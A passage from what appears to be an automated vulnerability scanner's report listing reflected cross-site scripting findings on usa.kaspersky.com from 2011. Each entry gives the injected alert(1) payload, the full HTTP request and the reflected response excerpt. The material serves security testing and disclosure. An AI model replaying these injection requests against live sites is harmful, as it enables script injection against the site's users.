The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e31"><script>alert(1)</script>dd86b28eecc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_searchc9e31"><script>alert(1)</script>dd86b28eecc/index.html HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:09:27 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145367"
Content-Type: text/html; charset=utf-8
Content-Length: 30273
Date: Sun, 04 Sep 2011 14:09:33 GMT
X-Varnish: 1163253438
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searchc9e31"><script>alert(1)</script>dd86b28eecc/index.html" />
...[SNIP]...

1.163. http://usa.kaspersky.com/search/apachesolr_search/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e5"><script>alert(1)</script>ba42b202e41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:11:23 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145483"
Content-Type: text/html; charset=utf-8
Content-Length: 30229
Date: Sun, 04 Sep 2011 14:11:37 GMT
X-Varnish: 1163257584
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/index.html646e5"><script>alert(1)</script>ba42b202e41" />
...[SNIP]...

1.164. http://usa.kaspersky.com/search/apachesolr_search/index.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3d0b"><script>alert(1)</script>be3c5cc808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/index.html?d3d0b"><script>alert(1)</script>be3c5cc808=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 14:07:56 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315145276"
Content-Type: text/html; charset=utf-8
Content-Length: 30522
Date: Sun, 04 Sep 2011 14:08:08 GMT
X-Varnish: 1163249569
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/index.html?d3d0b"><script>alert(1)</script>be3c5cc808=1" />
...[SNIP]...

1.165. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ede6"><script>alert(1)</script>33cc4e8f02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search1ede6"><script>alert(1)</script>33cc4e8f02d/apachesolr_search/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:52:57 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140777"
Content-Type: text/html; charset=utf-8
Content-Length: 30762
Date: Sun, 04 Sep 2011 12:53:32 GMT
X-Varnish: 1163098818
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search1ede6"><script>alert(1)</script>33cc4e8f02d/apachesolr_search/xss" />
...[SNIP]...

1.166. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af2e6"-alert(1)-"2ac881d387c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /searchaf2e6"-alert(1)-"2ac881d387c/apachesolr_search/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 404 Not Found
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:54:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140884"
Content-Type: text/html; charset=utf-8
Content-Length: 30665
Date: Sun, 04 Sep 2011 12:55:25 GMT
X-Varnish: 1163101369
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/searchaf2e6"-alert(1)-"2ac881d387c/apachesolr_search/xss";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.167. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d30"><script>alert(1)</script>1c2b9503e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_searcha7d30"><script>alert(1)</script>1c2b9503e52/xss HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:57:18 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141038"
Content-Type: text/html; charset=utf-8
Content-Length: 30245
Date: Sun, 04 Sep 2011 12:57:23 GMT
X-Varnish: 1163106279
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_searcha7d30"><script>alert(1)</script>1c2b9503e52/xss" />
...[SNIP]...

1.168. http://usa.kaspersky.com/search/apachesolr_search/xss [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f302c"><script>alert(1)</script>4c19078928f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/xssf302c"><script>alert(1)</script>4c19078928f HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 13:01:44 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315141304"
Content-Type: text/html; charset=utf-8
Content-Length: 30180
Date: Sun, 04 Sep 2011 13:02:02 GMT
X-Varnish: 1163114265
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/xssf302c"><script>alert(1)</script>4c19078928f" />
...[SNIP]...

1.169. http://usa.kaspersky.com/search/apachesolr_search/xss [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/search/apachesolr_search/xss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0ef0"><script>alert(1)</script>70160970dfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/apachesolr_search/xss?c0ef0"><script>alert(1)</script>70160970dfe=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.764119128.1315138485.1315138485.1315138485.1; __utmb=205612169.1.10.1315138485; __utmc=205612169; __utmz=205612169.1315138485.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|2731B5C785013339-4000010CE01E480D[CE]; slider_session=yes; gpv_pageName=Homepage; s_nr=1315139037033-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fsites%25252Fusa.kaspersky.com%25252Ffiles%25252Fcustom_search%25252Fsearch-grey.gif%2526ot%253DIMAGE; NO_CACHE=Y

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sun, 04 Sep 2011 12:48:03 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315140483"
Content-Type: text/html; charset=utf-8
Content-Length: 30037
Date: Sun, 04 Sep 2011 12:48:58 GMT
X-Varnish: 1163089822
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/search/apachesolr_search/xss?c0ef0"><script>alert(1)</script>70160970dfe=1" />
...[SNIP]...

1.170. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 10] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a65a4"-alert(1)-"2aa5ec6e5f1 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.cssa65a4"-alert(1)-"2aa5ec6e5f1?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:33:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139616"
Content-Type: text/html; charset=utf-8
Content-Length: 31332
Date: Sun, 04 Sep 2011 12:33:41 GMT
X-Varnish: 1163068406
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.cssa65a4"-alert(1)-"2aa5ec6e5f1?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.171. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 10] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058e"><script>alert(1)</script>98cdc6b835d was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css8058e"><script>alert(1)</script>98cdc6b835d?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:32:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315139567"
Content-Type: text/html; charset=utf-8
Content-Length: 31428
Date: Sun, 04 Sep 2011 12:33:00 GMT
X-Varnish: 1163067106
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css8058e"><script>alert(1)</script>98cdc6b835d?R" />
...[SNIP]...

1.172. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45325"><script>alert(1)</script>c89d0f96b80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites45325"><script>alert(1)</script>c89d0f96b80/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138816"
Content-Type: text/html; charset=utf-8
Content-Length: 31430
Date: Sun, 04 Sep 2011 12:20:18 GMT
X-Varnish: 1163046389
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites45325"><script>alert(1)</script>c89d0f96b80/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R" />
...[SNIP]...

1.173. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50a3f"-alert(1)-"80bc3e9188a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites50a3f"-alert(1)-"80bc3e9188a/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138823"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:20:24 GMT
X-Varnish: 1163046534
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
'yes') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites50a3f"-alert(1)-"80bc3e9188a/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ***********
...[SNIP]...

1.174. http://usa.kaspersky.com/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://usa.kaspersky.com
Path:	/sites/all/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42cc5"-alert(1)-"19bcc8754ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sites/all42cc5"-alert(1)-"19bcc8754ee/themes/zen/kaspersky_usatheme/custom/modules/views_slideshow_ddblock/latam-home/views-slideshow-ddblock-cycle-latam-home.css?R HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/?domain=kapersky.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 04 Sep 2011 12:20:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1315138859"
Content-Type: text/html; charset=utf-8
Content-Length: 31333
Date: Sun, 04 Sep 2011 12:21:01 GMT
X-Varnish: 1163047466
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

